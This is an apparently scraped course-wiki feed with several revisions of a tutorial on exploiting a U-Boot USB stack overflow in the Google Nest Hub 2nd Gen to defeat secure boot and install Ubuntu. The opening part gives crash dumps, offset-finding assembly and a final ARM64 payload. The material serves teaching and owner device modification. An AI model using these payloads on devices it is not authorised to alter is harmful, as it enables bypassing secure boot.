 x18: 000000007bee1dc8 x19: 0000000000000000&lt;br /&gt;
 x20: 0000000000000000 x21: 0000000000000000&lt;br /&gt;
 x22: 000000000000002a x23: 000000007c008490&lt;br /&gt;
 x24: 000000007c008490 x25: 000000007ffdcd80&lt;br /&gt;
 x26: 0000000000000000 x27: 0000000000000000&lt;br /&gt;
 x28: 000000007c009ac0 x29: 0000000000000000&lt;br /&gt;
 &lt;br /&gt;
 Resetting CPU ...&lt;br /&gt;
&lt;br /&gt;
This is a good indicator that the device indeed is vulnerable to the bug.&lt;br /&gt;
We see also the global data pointer &amp;quot;gd&amp;quot; which is stored in register x18.&lt;br /&gt;
The bug allows to overflow a buffer on the stack to overwrite a return address.&lt;br /&gt;
&lt;br /&gt;
U-Boot source code (https://drive.google.com/file/d/1euEvmbInWddUFAhMhHe628WAnpdYpGIa/view?usp=sharing) shows us that stack top is located below said gd.&lt;br /&gt;
&lt;br /&gt;
==== Acquiring the offset of payload address ====&lt;br /&gt;
&lt;br /&gt;
Now to look for the offset in the payload that is sufficient to overwrite the return address, a payload with incremental arbitrary invalid pointers is forged and used as block 0 of the device.&lt;br /&gt;
&lt;br /&gt;
 .text&lt;br /&gt;
 .global _start&lt;br /&gt;
 &lt;br /&gt;
 _start:&lt;br /&gt;
 .word 0xFFFFFC00&lt;br /&gt;
 .word 0xFFFFFC01&lt;br /&gt;
 .word 0xFFFFFC02&lt;br /&gt;
 [...]&lt;br /&gt;
 .word 0xFFFFFFFF&lt;br /&gt;
&lt;br /&gt;
The pico crashes this time with following error message:&lt;br /&gt;
&lt;br /&gt;
 &amp;quot;Synchronous Abort&amp;quot; handler, esr 0x8a000000&lt;br /&gt;
 elr: fffffc8f8110dc8e lr : fffffc8f8110dc8e (reloc)&lt;br /&gt;
 elr: fffffc8ffffffc8e lr : fffffc8ffffffc8e&lt;br /&gt;
 x0 : 00000000ffffffff x1 : 0000000000000001&lt;br /&gt;
 x2 : 000000007bed5888 x3 : 0000000000000000&lt;br /&gt;
 x4 : 0000000000001000 x5 : 0000000000000200&lt;br /&gt;
 x6 : fffffffffffffffe x7 : 0000000000000000&lt;br /&gt;
 x8 : 0000000000000001 x9 : 0000000000000008&lt;br /&gt;
 x10: 000000007c0021b0 x11: 000000007c009b80&lt;br /&gt;
 x12: 0000000000000001 x13: 0000000000000001&lt;br /&gt;
 x14: 000000007bed5c4c x15: 00000000ffffffff&lt;br /&gt;
 x16: 0000000000004060 x17: 0000000000000084&lt;br /&gt;
 x18: 000000007bee1dc8 x19: fffffc91fffffc90&lt;br /&gt;
 x20: fffffc93fffffc92 x21: fffffc95fffffc94&lt;br /&gt;
 x22: 000000000000002a x23: 000000007c008490&lt;br /&gt;
 x24: 000000007c008490 x25: 000000007ffdcd80&lt;br /&gt;
 x26: 0000000000000000 x27: 0000000000000000&lt;br /&gt;
 x28: 000000007c009ac0 x29: fffffc8dfffffc8c&lt;br /&gt;
 &lt;br /&gt;
 Resetting CPU ...&lt;br /&gt;
&lt;br /&gt;
The link register lr contains an invalid pointer : fffffc8ffffffc8e.&lt;br /&gt;
The values 0xFFFFFC8E and 0xFFFFFC8F are being recognized from the above payload. This means the offset is 0x238 (0x8e * 4 bytes).&lt;br /&gt;
&lt;br /&gt;
==== Determine the start address of payload ====&lt;br /&gt;
&lt;br /&gt;
Now it is required to determine the start address of the payload to be able to execute it.&lt;br /&gt;
We already know that stack top is located below gd address (register x18).&lt;br /&gt;
Maximum allowed block size is 0x8000, hence we have 8.185 branch instructions. We only need the address of any of these.&lt;br /&gt;
&lt;br /&gt;
A guess would be: (gd - 0x8000) = (0x7bee1dc8 - 0x8000) = 0x7BED9DC8.&lt;br /&gt;
&lt;br /&gt;
The pico code needs to be updated to use this new payload:&lt;br /&gt;
&lt;br /&gt;
 .text&lt;br /&gt;
 .global _start&lt;br /&gt;
 &lt;br /&gt;
 _start:&lt;br /&gt;
     b _payload&lt;br /&gt;
     b _payload&lt;br /&gt;
 [...]&lt;br /&gt;
 .dword 0x7BED9DC8 // payload pointer at offset 0x238&lt;br /&gt;
 [...]&lt;br /&gt;
     b _payload&lt;br /&gt;
     b _payload&lt;br /&gt;
 _payload:&lt;br /&gt;
     adr x19, _start&lt;br /&gt;
     mov x20, x30&lt;br /&gt;
     mov x21, sp&lt;br /&gt;
     mov x22, #0xcafe&lt;br /&gt;
     blr x13&lt;br /&gt;
&lt;br /&gt;
The first instruction adr sets register x19 to the payload&#039;s start address. The last instruction blr branches to an invalid pointer x13 to ensure a crash, and thus dump registers on UART.&lt;br /&gt;
&lt;br /&gt;
The pico, when using the new payload, shows the following:&lt;br /&gt;
&lt;br /&gt;
 &amp;quot;Synchronous Abort&amp;quot; handler, esr 0x8a000000&lt;br /&gt;
 elr: ffffffff8110e001 lr : fffffffffcfeb700 (reloc)&lt;br /&gt;
 elr: 0000000000000001 lr : 000000007bedd700&lt;br /&gt;
 x0 : 00000000ffffffff x1 : 0000000000000001&lt;br /&gt;
 x2 : 000000007bed5888 x3 : 0000000000000000&lt;br /&gt;
 x4 : 0000000000008000 x5 : 0000000000000200&lt;br /&gt;
 x6 : d63f01a0d2995fd6 x7 : 0000000000000000&lt;br /&gt;
 x8 : 0000000000000001 x9 : 0000000000000008&lt;br /&gt;
 x10: 000000007c0021b0 x11: 000000007c009b80&lt;br /&gt;
 x12: 0000000000000001 x13: 0000000000000001&lt;br /&gt;
 x14: 000000007bed5c4c x15: 00000000ffffffff&lt;br /&gt;
 x16: 0000000000004060 x17: 0000000000000084&lt;br /&gt;
 x18: 000000007bee1dc8 x19: 000000007bed5700&lt;br /&gt;
 x20: 000000007bed9dc8 x21: 000000007bed5960&lt;br /&gt;
 x22: 000000000000cafe x23: 000000007c008490&lt;br /&gt;
 x24: 000000007c008490 x25: 000000007ffdcd80&lt;br /&gt;
 x26: 0000000000000000 x27: 0000000000000000&lt;br /&gt;
 x28: 000000007c009ac0 x29: 14001f6e14001f6f&lt;br /&gt;
 &lt;br /&gt;
 Resetting CPU ...&lt;br /&gt;
&lt;br /&gt;
Register x22 contains the flag that indicates the payload was executed successfully. And x19 reveals that payload&#039;s start address is 0x7bed5700.&lt;br /&gt;
&lt;br /&gt;
To summarize, an USB Mass Storage device with following attributes is required:&lt;br /&gt;
&lt;br /&gt;
* block size of 1024, 2048, 4096, 8192, 16384 or 32768 bytes&lt;br /&gt;
* payload contained in block 0&lt;br /&gt;
* value 0x000000007bed5700 set at offset 0x238 in block 0&lt;br /&gt;
&lt;br /&gt;
==== Calling the bootloader ====&lt;br /&gt;
&lt;br /&gt;
This elevates us to execute arbitrary code. If we manage to obtain the bootloader, we can call the bootloader code in-memory, which is easier than setting up a baremetal payload for loading a whole OS.&lt;br /&gt;
&lt;br /&gt;
https://github.com/frederic/chipicopwn/blob/main/payloads/memdump_over_uart.c shows the required payload for dumping RAM Memory over the UART.&lt;br /&gt;
&lt;br /&gt;
First the gd structure (found on register x18) which contains a pointer to the bootloader code is being dumped.&lt;br /&gt;
&lt;br /&gt;
Variable gd-&amp;gt;relocaddr indicates that the bootloader is at 0x7fef2000. We dump memory from this address up to gd-&amp;gt;ram_top.&lt;br /&gt;
&lt;br /&gt;
==== Final Payload for the exploit ====&lt;br /&gt;
&lt;br /&gt;
We create a payload that elevates us to use U-Boot built-in commands.&lt;br /&gt;
This final payload&lt;br /&gt;
* fixes (in RAM) the bug we just exploited&lt;br /&gt;
* calls U-Boot function run_command_list with _command_list as argument&lt;br /&gt;
* sets the download buffer (0x01000000) as return address to execute next stage (if any)&lt;br /&gt;
&lt;br /&gt;
 .text&lt;br /&gt;
 .global _start&lt;br /&gt;
 _start:&lt;br /&gt;
     sub sp, sp, #0x1000 // move SP below us to avoid being overwritten when calling functions&lt;br /&gt;
     ldr x0, _bug_ptr&lt;br /&gt;
     ldr x1, _bug_fix&lt;br /&gt;
     str x1, [x0]  // fix the bug we just exploited&lt;br /&gt;
     adr x0, _command_list&lt;br /&gt;
     mov w1, #0xffffffff&lt;br /&gt;
     mov w2, #0x0&lt;br /&gt;
     ldr x30, _download_buf // set LR to download buffer&lt;br /&gt;
     ldr x3, _run_command_list // load binary into download buffer&lt;br /&gt;
     br x3&lt;br /&gt;
 &lt;br /&gt;
 _bug_ptr: .dword 0x7ff26060&lt;br /&gt;
 _bug_fix: .dword 0xd65f03c0d2800000&lt;br /&gt;
 _download_buf: .dword 0x01000000&lt;br /&gt;
 _run_command_list: .dword 0x7ff24720&lt;br /&gt;
 _command_list: .asciz &amp;quot;echo CHIPICOPWN!;osd setcolor 0x1b0d2b0d;usb reset;fatload usb 0 0x8000000 CHIPICOPWN.BMP;bmp display 0x8000000;while true;do usb reset;if fatload usb 0 0x01000000 u-boot-elaine.bin;then echo yolo;exit;fi;done;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The U-Boot commands in _command_list load 2 files from the first FAT partition of USB Mass Storage device:&lt;br /&gt;
&lt;br /&gt;
* CHIPICOPWN.BMP : the logo to display&lt;br /&gt;
* u-boot-elaine.bin : the next payload to run. In our case, a custom U-Boot image.&lt;br /&gt;
&lt;br /&gt;
Once the function run_command_list returns, the next payload is executed.&lt;br /&gt;
&lt;br /&gt;
Since Rasperry Pi Pico flash memory is limited, we can put the file u-boot-elaine.bin on another USB flash drive that is hot-swapped with the Pico.&lt;br /&gt;
&lt;br /&gt;
Now we can boot an unsigned(!) OS. A good example would be the Ubuntu image for Raspberry Pi Generic (64-bit ARM), available at https://cdimage.ubuntu.com/releases/22.04/release/&lt;br /&gt;
&lt;br /&gt;
In conclusion we now have the&lt;br /&gt;
* custom U-Boot bootloader with disabled secure boot: https://github.com/frederic/elaine-u-boot&lt;br /&gt;
* custom Linux kernel for elaine for using peripherals: https://github.com/frederic/elaine-linux/commit/11068237d9178e77d79e3a5d27fc4f8f9b923c51 &lt;br /&gt;
** note that the initial ramdisk had been repacked to be compatible with the Nest&#039;s touchscreen&lt;br /&gt;
&lt;br /&gt;
These files are copied to the Ubuntu USB flash drive.&lt;br /&gt;
&lt;br /&gt;
At last, we can plug in the Raspberry Pico, hotswap it with the USB drive when the logo shows up and we can install Ubuntu.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
We want to change the OS of a Google Nest Hub 2. Generation by exploiting a vulnerability in the bootloader u-boot.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* 1x Google Nest Hub, 2nd Generation --&amp;gt; [[Nest_Hub_2nd_Generation]]&lt;br /&gt;
* 1x Raspberry Pi Pico&lt;br /&gt;
* 1x Powered Micro-USB Hub (NestUSB does not provide power)&lt;br /&gt;
* 2x Micro-USB cables&lt;br /&gt;
* 1x UART to USB&lt;br /&gt;
* 1x bootable USB Stick with Ubuntu 22.04 and the files from https://github.com/frederic/elaine-bootimg (Elaine bootimg gives privilege to use the Nest touchscreen for the Linux OS)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1: Flashing Ubuntu USB Stick ===&lt;br /&gt;
&lt;br /&gt;
Flash an USB stick with Ubuntu 22.04, if you haven&#039;t done earlier. You can use Rufus or Etcher for this task.&lt;br /&gt;
&lt;br /&gt;
[[File:01_rufus_for_bootUSB.jpeg|500px|thumb|right|rufusflash]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 2: Refining Ubuntu USB Stick ===&lt;br /&gt;
&lt;br /&gt;
In order to be compatible with the touchscreen of the nest, we need to adjust some files in partition system boot.&lt;br /&gt;
&lt;br /&gt;
Copy the following files from the repository https://github.com/frederic/elaine-bootimg in partition system-boot :&lt;br /&gt;
* u-boot-elaine.bin : U-Boot image for elaine&lt;br /&gt;
* u-boot-elaine.cmd : U-Boot environment file&lt;br /&gt;
* boot.img : Boot image (Kernel for elaine, DTB, initrd)&lt;br /&gt;
&lt;br /&gt;
=== Step 3: Theoretical Background ===&lt;br /&gt;
&lt;br /&gt;
The exploit is made possible because there is a stack overflow within the bootloader u-Boot, which happens with block sizes greater than 512 bytes. Most USB-Sticks only support 512 Bytes. The solution is taking a suitable microcontroller, in our case a Raspberry Pico, which is equipped with TinyUSB, which provides a Mass Storage device example code that can turn a Raspberry Pi Pico into a customizable USB flash drive.&lt;br /&gt;
This Pico will be used to inject arbitrary payload into the stack memory and overwrite return address to execute the payload.&lt;br /&gt;
However, the storage of the pico is very limited, hence we will have to hotswap the pico with our USB Stick, which contains all neccessary data to install the OS.&lt;br /&gt;
&lt;br /&gt;
=== Step 4: Preparing The Raspberry Pico ===&lt;br /&gt;
&lt;br /&gt;
For the Pico we will have to prepare the following:&lt;br /&gt;
&lt;br /&gt;
1. Install dependencies&lt;br /&gt;
Update the system:&lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
&lt;br /&gt;
Install dependencies:&lt;br /&gt;
 sudo apt install git&lt;br /&gt;
 sudo apt install openocd&lt;br /&gt;
 sudo apt install gcc-multilib&lt;br /&gt;
 sudo apt install build-essential&lt;br /&gt;
 sudo apt install python3-serial&lt;br /&gt;
 sudo apt install libudev-dev&lt;br /&gt;
 sudo apt install cmake gcc-arm-none-eabi libnewlib-arm-none-eabi build-essential &lt;br /&gt;
 sudo apt install libstdc++-arm-none-eabi-newlib&lt;br /&gt;
&lt;br /&gt;
Create workspace, current location /home/&lt;br /&gt;
 mkdir pico&lt;br /&gt;
 cd pico&lt;br /&gt;
&lt;br /&gt;
Clone pico-sdk and update it, current location /home/pico/&lt;br /&gt;
 git clone https://github.com/raspberrypi/pico-sdk.git --branch master&lt;br /&gt;
 cd pico-sdk&lt;br /&gt;
 git submodule update --init&lt;br /&gt;
&lt;br /&gt;
In the Pico folder we do clone our chipicopwn, current location /home/pico/&lt;br /&gt;
&lt;br /&gt;
 sudo git clone https://github.com/frederic/chipicopwn chipicopwn&lt;br /&gt;
 cd chipicopwn&lt;br /&gt;
&lt;br /&gt;
Now we need the commands from the repository:&lt;br /&gt;
Set the Path to wherever you saved your pico-sdk repository&lt;br /&gt;
 export PICO_SDK_PATH=/home/user/pico/pico-sdk/&lt;br /&gt;
&lt;br /&gt;
!! If you have this in the home directory do not use relative paths, since this command is executed as root!&lt;br /&gt;
&lt;br /&gt;
Flashing the program, current location /home/pico/chipicopwn&lt;br /&gt;
It may be that a build folder already exists. It is recommended to delete it and make a new one, since some files may or may not work / flash as intended.&lt;br /&gt;
&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 sudo cmake ..&lt;br /&gt;
 sudo make&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now the project should be built.&lt;br /&gt;
Now we need to boot the Pico in bootloader mode (by holding down the BOOTSEL button) and get the chipicopwn.uf2 on the pico device itself by copying it.&lt;br /&gt;
&lt;br /&gt;
Now we should have two hardware components prepared:&lt;br /&gt;
&lt;br /&gt;
The USB Stick with the Ubuntu Image optimized for touchscreen and the Raspberry Pico with the modified bootloader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 5: Preparing The Hardware ===&lt;br /&gt;
&lt;br /&gt;
Remove the lid underneath the Nest Hub base to expose USB port&lt;br /&gt;
Connect the Raspberry Pico to Nest Hub (through powered-hub or Y-cable because the USB port does not provide power)&lt;br /&gt;
[[File:HardwareCabled.png|500px|thumb|right|Verkabelte Hardware]]&lt;br /&gt;
Hold Volume Down + Volume Up + Mute buttons while powering on the Nest Hub&lt;br /&gt;
Once CHIPICOPWN logo appears on screen, replace the Raspberry Pico with USB flash drive&lt;br /&gt;
&lt;br /&gt;
Now you can install Ubuntu on your Google Nest.&lt;br /&gt;
&lt;br /&gt;
=== Result ===&lt;br /&gt;
[[File:Demonstration.png|500px|thumb|Demonstration]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Nest_Hub_2nd_Generation]]&lt;br /&gt;
[[Raspberry Pi Pico]]&lt;br /&gt;
[[Powered Micro-USB Hub]]&lt;br /&gt;
[[Micro-USB cable]]&lt;br /&gt;
optional for log insight: [[UART to USB Adapter]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[WFP2]] (2023)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html&lt;br /&gt;
* https://github.com/frederic/chipicopwn&lt;br /&gt;
* https://github.com/frederic/elaine-bootimg&lt;br /&gt;
&lt;br /&gt;
Teardown Links:&lt;br /&gt;
&lt;br /&gt;
https://electronics360.globalspec.com/article/17053/teardown-google-nest-hub-2nd-gen&lt;br /&gt;
https://fccid.io/A4RGUIK2/Internal-Photos/Internal-Photos-20200702-v1-Internal-Photos-5035937?utm_content=cmp-true&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Uboot-cfg.png&amp;diff=14375</id>
		<title>File:Uboot-cfg.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Uboot-cfg.png&amp;diff=14375"/>
		<updated>2024-02-13T12:39:19Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: The call flow triggered by the recovery feature of the Google Nest Hub 2nd Generation (https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary ==&lt;br /&gt;
The call flow triggered by the recovery feature of the Google Nest Hub 2nd Generation (https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html)&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14103</id>
		<title>(Legacy) USB Vulnerability on Google Nest Hub</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14103"/>
		<updated>2024-01-27T15:26:30Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Disclaimer ==&lt;br /&gt;
&lt;br /&gt;
Article in progress, this is not the final version.&lt;br /&gt;
This tutorial has been patched by Google in December 2021 via OTA-update, now the booting sequence of the Recovery Mode does not work as intended for this exploit to work. &lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
We want to change the OS of a Google Nest Hub 2. Generation by exploiting a vulnerability in the bootloader u-boot.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* 1x Google Nest Hub, 2nd Generation --&amp;gt; [[Nest_Hub_2nd_Generation]]&lt;br /&gt;
* 1x Raspberry Pi Pico&lt;br /&gt;
* 1x Powered Micro-USB Hub (NestUSB does not provide power)&lt;br /&gt;
* 2x Micro-USB cables&lt;br /&gt;
* 1x UART to USB&lt;br /&gt;
* 1x bootable USB Stick with Ubuntu 22.04 and the files from https://github.com/frederic/elaine-bootimg (Elaine bootimg gives privilege to use the Nest touchscreen for the Linux OS)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Flash an USB stick with Ubuntu 22.04, if you haven&#039;t done earlier. You can use Rufus or Etcher for this task.&lt;br /&gt;
&lt;br /&gt;
[[File:01_rufus_for_bootUSB.jpeg|500px|thumb|right|rufusflash]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
In order to be compatible with the touchscreen of the nest, we need to adjust some files in partition system boot.&lt;br /&gt;
&lt;br /&gt;
Copy the following files from the repository https://github.com/frederic/elaine-bootimg in partition system-boot :&lt;br /&gt;
* u-boot-elaine.bin : U-Boot image for elaine&lt;br /&gt;
* u-boot-elaine.cmd : U-Boot environment file&lt;br /&gt;
* boot.img : Boot image (Kernel for elaine, DTB, initrd)&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
The exploit is made possible because there is a stack overflow within the bootloader u-Boot, which happens with block sizes greater than 512 bytes. Most USB-Sticks only support 512 Bytes. The solution is taking a suitable microcontroller, in our case a Raspberry Pico, which is equipped with TinyUSB, which provides a Mass Storage device example code that can turn a Raspberry Pi Pico into a customizable USB flash drive.&lt;br /&gt;
This Pico will be used to inject arbitrary payload into the stack memory and overwrite return address to execute the payload.&lt;br /&gt;
However, the storage of the pico is very limited, hence we will have to hotswap the pico with our USB Stick, which contains all neccessary data to install the OS.&lt;br /&gt;
&lt;br /&gt;
=== Step 4 ===&lt;br /&gt;
&lt;br /&gt;
For the Pico we will have to prepare the following:&lt;br /&gt;
&lt;br /&gt;
1. Install dependencies&lt;br /&gt;
Update the system:&lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
&lt;br /&gt;
Install dependencies:&lt;br /&gt;
 sudo apt install git&lt;br /&gt;
 sudo apt install openocd&lt;br /&gt;
 sudo apt install gcc-multilib&lt;br /&gt;
 sudo apt install build-essential&lt;br /&gt;
 sudo apt install python3-serial&lt;br /&gt;
 sudo apt install libudev-dev&lt;br /&gt;
 sudo apt install cmake gcc-arm-none-eabi libnewlib-arm-none-eabi build-essential &lt;br /&gt;
 sudo apt install libstdc++-arm-none-eabi-newlib&lt;br /&gt;
&lt;br /&gt;
Create workspace, current location /home/&lt;br /&gt;
 mkdir pico&lt;br /&gt;
 cd pico&lt;br /&gt;
&lt;br /&gt;
Clone pico-sdk and update it, current location /home/pico/&lt;br /&gt;
 git clone https://github.com/raspberrypi/pico-sdk.git --branch master&lt;br /&gt;
 cd pico-sdk&lt;br /&gt;
 git submodule update --init&lt;br /&gt;
&lt;br /&gt;
In the Pico folder we do clone our chipicopwn, current location /home/pico/&lt;br /&gt;
&lt;br /&gt;
 sudo git clone https://github.com/frederic/chipicopwn chipicopwn&lt;br /&gt;
 cd chipicopwn&lt;br /&gt;
&lt;br /&gt;
Now we need the commands from the repository:&lt;br /&gt;
Set the Path to wherever you saved your pico-sdk repository&lt;br /&gt;
 export PICO_SDK_PATH=/home/user/pico/pico-sdk/&lt;br /&gt;
&lt;br /&gt;
!! If you have this in the home directory do not use relative paths, since this command is executed as root!&lt;br /&gt;
&lt;br /&gt;
Flashing the program, current location /home/pico/chipicopwn&lt;br /&gt;
It may be that a build folder already exists. It is recommended to delete it and make a new one, since some files may or may not work / flash as intended.&lt;br /&gt;
&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 sudo cmake ..&lt;br /&gt;
 sudo make&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now the project should be built.&lt;br /&gt;
Now we need to boot the Pico in bootloader mode (by holding down the BOOTSEL button) and get the chipicopwn.uf2 on the pico device itself by copying it.&lt;br /&gt;
&lt;br /&gt;
Now we should have two hardware components prepared:&lt;br /&gt;
&lt;br /&gt;
The USB Stick with the Ubuntu Image optimized for touchscreen and the Raspberry Pico with the modified bootloader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 5 ===&lt;br /&gt;
&lt;br /&gt;
Remove the lid underneath the Nest Hub base to expose USB port&lt;br /&gt;
Connect the Raspberry Pico to Nest Hub (through powered-hub or Y-cable because the USB port does not provide power)&lt;br /&gt;
[[File:HardwareCabled.png|500px|thumb|right|Verkabelte Hardware]]&lt;br /&gt;
Hold Volume Down + Volume Up + Mute buttons while powering on the Nest Hub&lt;br /&gt;
Once CHIPICOPWN logo appears on screen, replace the Raspberry Pico with USB flash drive&lt;br /&gt;
&lt;br /&gt;
Now you can install Ubuntu on your Google Nest.&lt;br /&gt;
&lt;br /&gt;
=== Result ===&lt;br /&gt;
[[File:Demonstration.png|500px|thumb|Demonstration]]&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Nest_Hub_2nd_Generation]]&lt;br /&gt;
[[Raspberry Pi Pico]]&lt;br /&gt;
[[Powered Micro-USB Hub]]&lt;br /&gt;
[[Micro-USB cable]]&lt;br /&gt;
optional for log insight: [[UART to USB Adapter]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[WFP2]] (2023)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html&lt;br /&gt;
* https://github.com/frederic/chipicopwn&lt;br /&gt;
* https://github.com/frederic/elaine-bootimg&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14102</id>
		<title>(Legacy) USB Vulnerability on Google Nest Hub</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14102"/>
		<updated>2024-01-27T15:25:44Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: refactoring, but doesn&amp;#039;t look too good&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Disclaimer ==&lt;br /&gt;
&lt;br /&gt;
Article in progress, this is not the final version.&lt;br /&gt;
This tutorial has been patched by Google in December 2021 via OTA-update, now the booting sequence of the Recovery Mode does not work as intended for this exploit to work. &lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
We want to change the OS of a Google Nest Hub 2. Generation by exploiting a vulnerability in the bootloader u-boot.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* 1x Google Nest Hub, 2nd Generation --&amp;gt; [[Nest_Hub_2nd_Generation]]&lt;br /&gt;
* 1x Raspberry Pi Pico&lt;br /&gt;
* 1x Powered Micro-USB Hub (NestUSB does not provide power)&lt;br /&gt;
* 2x Micro-USB cables&lt;br /&gt;
* 1x UART to USB&lt;br /&gt;
* 1x bootable USB Stick with Ubuntu 22.04 and the files from https://github.com/frederic/elaine-bootimg (Elaine bootimg gives privilege to use the Nest touchscreen for the Linux OS)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Flash an USB stick with Ubuntu 22.04, if you haven&#039;t done earlier.&lt;br /&gt;
&lt;br /&gt;
[[File:01_rufus_for_bootUSB.jpeg|500px|thumb|right|rufusflash]]&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
In order to be compatible with the touchscreen of the nest, we need to adjust some files in partition system boot.&lt;br /&gt;
&lt;br /&gt;
Copy the following files from the repository https://github.com/frederic/elaine-bootimg in partition system-boot :&lt;br /&gt;
* u-boot-elaine.bin : U-Boot image for elaine&lt;br /&gt;
* u-boot-elaine.cmd : U-Boot environment file&lt;br /&gt;
* boot.img : Boot image (Kernel for elaine, DTB, initrd)&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
The exploit is made possible because there is a stack overflow within the bootloader u-Boot, which happens with block sizes greater than 512 bytes. Most USB-Sticks only support 512 Bytes. The solution is taking a suitable microcontroller, in our case a Raspberry Pico, which is equipped with TinyUSB, which provides a Mass Storage device example code that can turn a Raspberry Pi Pico into a customizable USB flash drive.&lt;br /&gt;
This Pico will be used to inject arbitrary payload into the stack memory and overwrite return address to execute the payload.&lt;br /&gt;
However, the storage of the pico is very limited, hence we will have to hotswap the pico with our USB Stick, which contains all neccessary data to install the OS.&lt;br /&gt;
&lt;br /&gt;
=== Step 4 ===&lt;br /&gt;
&lt;br /&gt;
For the Pico we will have to prepare the following:&lt;br /&gt;
&lt;br /&gt;
1. Install dependencies&lt;br /&gt;
Update the system:&lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
&lt;br /&gt;
Install dependencies:&lt;br /&gt;
 sudo apt install git&lt;br /&gt;
 sudo apt install openocd&lt;br /&gt;
 sudo apt install gcc-multilib&lt;br /&gt;
 sudo apt install build-essential&lt;br /&gt;
 sudo apt install python3-serial&lt;br /&gt;
 sudo apt install libudev-dev&lt;br /&gt;
 sudo apt install cmake gcc-arm-none-eabi libnewlib-arm-none-eabi build-essential &lt;br /&gt;
 sudo apt install libstdc++-arm-none-eabi-newlib&lt;br /&gt;
&lt;br /&gt;
Create workspace, current location /home/&lt;br /&gt;
 mkdir pico&lt;br /&gt;
 cd pico&lt;br /&gt;
&lt;br /&gt;
Clone pico-sdk and update it, current location /home/pico/&lt;br /&gt;
 git clone https://github.com/raspberrypi/pico-sdk.git --branch master&lt;br /&gt;
 cd pico-sdk&lt;br /&gt;
 git submodule update --init&lt;br /&gt;
&lt;br /&gt;
In the Pico folder we do clone our chipicopwn, current location /home/pico/&lt;br /&gt;
&lt;br /&gt;
